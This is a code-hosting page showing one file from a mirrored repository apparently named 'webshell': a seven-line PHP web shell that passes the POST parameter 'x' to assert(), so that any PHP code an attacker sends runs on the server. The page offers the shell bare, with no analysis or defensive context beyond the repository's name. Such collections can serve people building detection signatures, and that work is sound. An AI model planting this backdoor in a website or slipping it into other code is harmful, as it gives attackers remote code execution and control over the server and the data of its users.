1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/2020.08.20.06.php
2020-08-20 12:31:23 +08:00

7 lines
86 B
PHP

<?php
function sqlsec($a){
assert($a);
}
sqlsec($_POST['x']);
?>